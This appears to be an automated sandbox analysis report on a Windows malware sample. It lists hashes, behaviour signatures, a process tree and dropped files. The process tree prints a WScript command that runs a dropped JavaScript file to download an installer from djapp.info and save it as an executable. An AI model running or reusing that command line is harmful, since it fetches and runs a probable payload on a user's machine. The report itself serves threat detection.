Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2024 21:49

General

  • Target

    36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    36b77f9deebcf77fcc62c6da9bc55994

  • SHA1

    0187da02d35ed149ecbb60da4e661ff7245bc9a7

  • SHA256

    488bbf10a6a87a7deb46fb030292cd646960b1af392c3fe0da5f288e895e585a

  • SHA512

    bd2d68caf1b56490726f4c325012b1eabf79e1dd737d1b8039a839625c4fb77b8536cac456007d4958f669eaf4fd9986318f6115b3738c035b48951dba44e227

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:1696
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2516
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2004
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2212
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2088

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    844a93e096b7ac8f56f9286642d59fed

    SHA1

    6bf7e649df885f4338d9b84864c4fb2c6d06d2ed

    SHA256

    5a344dea279de4e33fd977f55d63b9518cac5ad62e2e5cd09a81f56ced29eddb

    SHA512

    eea9f130fdbb0b0ad23e0fcfc25c14be2827cb641f1d1a6aa2097a1e8b9b81e8e3ebc5633f8fccac60039d361da971f1c5e1085371ca23bc0c3c125bdddd60df

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    0211d032752fa7708b086e24c137de1d

    SHA1

    12b45877562914e3cfb39048063e0c843c00685a

    SHA256

    13fbd17d8c8560e991131140cec5536f896966671e94aac9105ec1332efae235

    SHA512

    4b31365df75c361febaff904246297f581f2ced3839f32f6d5e66a3855ed2a62f26550c2718ff6698c625774d55df4e9b71174e81e8e8fc319e6812edb959228

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b7b1f8873696419f4364540ba5d6002b

    SHA1

    e86b49c21590e605d313f60e95554a879a405fb0

    SHA256

    31d9cf9b567a39c7db288431a2e0b3725aa976bf6dbb67afee5a233e7d71dfdc

    SHA512

    fabc8d079de03fae7eb9ef1d0b80b448c7673a3afdaadf484727dd4d4f2ea426af3375b8a4d8a98680ee837de64e22cfd593d02a9deaf318e13540d6efdf6dd2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    abf22e1b086a79e5b39991bfe77196aa

    SHA1

    4bd5292871a129eee5bf3b0b579e499f67ac2218

    SHA256

    eb5464f9f4f99bf341ad6d1af1434656c53f6f58c1aba33b69ad5f70325a1850

    SHA512

    89adff9b30cf0110bb52a3a11eeb1eba1c4e61c1b38fe7fe69b26b337e3fe93590e05be187f2e920527dcaf24ecb2ba6c38dbb63352b4962b7cc5660f713e2c8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

    Filesize

    40KB

    MD5

    bdd845e8776dc7d46e2f2755af60892e

    SHA1

    ba62ef4b89773dfa6753cd7c39e18388eff3ce33

    SHA256

    9bf90d3712349c7fb0bd2877923f98c77789e9bcbb7e544ba8e5d61fa6cdac3b

    SHA512

    81a661570ea1f82189365f3f9e6c31812a85bd92b65e674ae01df700c43225995a434c751ed710dd65ffd8e3c0091d58ed4d32e5de16b5873ea3cbd8286842ad

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

    Filesize

    40KB

    MD5

    923ab9d2edf19ff3412e06d73dd1da77

    SHA1

    62ba6cf4214028d0c674f290679ea6f82b59d093

    SHA256

    28b7948b4a13b8c975a5cb08cfc9a90b1d6e63d95323a14e5a4e64744869555e

    SHA512

    25f49c4ffd6ca5adfc16bb6bb9bba89e16a1e18973cb4a854f43bfc287e0604f2ef6d7a746896c48cd3975b7445f1fbc1619a0ea7433ee5eaa7683e6df6f21fe

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

    Filesize

    6KB

    MD5

    d615e9b74470164a6669f3b0ff787e7b

    SHA1

    3c6456e4dea05bd39b33f75a5a2e882f7b4edcdf

    SHA256

    05e71ae87c9bdfe255beac821c0371a3cc22e513cdc9c514149ece84b2804693

    SHA512

    9f6948eb84db3d60bd08291fb10989f559165401d00fc0e0f987b1dfd345abc6f7865b906b4c54c177289c80c9305f43fa5177db495c668d055e59860689b7f4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

    Filesize

    40KB

    MD5

    b22769cfe4cd018b036d01cca9cd2837

    SHA1

    55e06bba7f4cab5f04127b38fece10affe5e0469

    SHA256

    dcd55a9dc7e5138fbca694f8486975fc38165439a69c4fb3eb6b305f18813d87

    SHA512

    1c5fdee0b441c1eb782f5f4f5808e2661a6971723d95adc68fdf5c0998859000cabb5c890e09474a3d4442b416d125258f670ee89501a40c73d7b0a9204ce4a7

  • C:\Users\Admin\AppData\Local\Temp\Cab8F25.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\TarB3F5.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\fuf2359.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JFYKJRF7.txt

    Filesize

    175B

    MD5

    92451270d1ea8a013e1620e216fe5456

    SHA1

    d5b1b80f5991f9f201ea56900f02035193a837c1

    SHA256

    632d1aae8a74d32b7f006d1a78f0f5d41ee5ca97d5b730e997c0d00028ee0efb

    SHA512

    c63b2c1bd3d6faf275e182ee6ce0afbfbec869e33462ea94cd81abe76ed1409c4e188255afd686b42661320e8ba70e7dab565439d2ad5de72410a3357d23e9bb